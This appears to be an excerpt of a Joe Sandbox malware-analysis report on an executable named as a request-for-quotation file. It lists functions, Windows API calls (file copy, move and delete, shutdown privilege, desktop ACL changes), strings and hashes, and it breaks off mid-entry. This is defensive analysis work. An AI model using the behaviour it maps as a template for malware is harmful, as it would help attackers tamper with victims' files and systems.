                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                        • String ID: $@OH$default$winsta0
                                                        • API String ID: 3324942560-3791954436
                                                        • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                        • Opcode Fuzzy Hash: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                        Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2188072990-1173974218
                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                        Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                        • __swprintf.LIBCMT ref: 004789D3
                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                        • __swprintf.LIBCMT ref: 00478A79
                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                        • __swprintf.LIBCMT ref: 00478B03
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 999945258-2428617273
                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                        Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                        • _wcscat.LIBCMT ref: 004034BC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                        • _wcslen.LIBCMT ref: 00403623
                                                        • _wcslen.LIBCMT ref: 0040367D
                                                        Strings
                                                        • Error opening the file, xrefs: 00428231
                                                        • Unterminated string, xrefs: 00428348
                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                        • _, xrefs: 0040371C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                        • API String ID: 3393021363-188983378
                                                        • Opcode ID: c5e3c4a49faa7a981a1cf8f9c99aeda831f9ca6caf439e1dfa945647fe2f9d32
                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                        • Opcode Fuzzy Hash: c5e3c4a49faa7a981a1cf8f9c99aeda831f9ca6caf439e1dfa945647fe2f9d32
                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                        Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                        Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2192556992-3457252023
                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                        Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                        • __swprintf.LIBCMT ref: 004722B9
                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FolderPath$LocalTime__swprintf
                                                        • String ID: %.3d
                                                        • API String ID: 3337348382-986655627
                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                        Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                        Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                        • GetLastError.KERNEL32 ref: 00433414
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 2938487562-3733053543
                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                        Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 1255039815-0
                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                        Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00433073
                                                        • __swprintf.LIBCMT ref: 00433085
                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
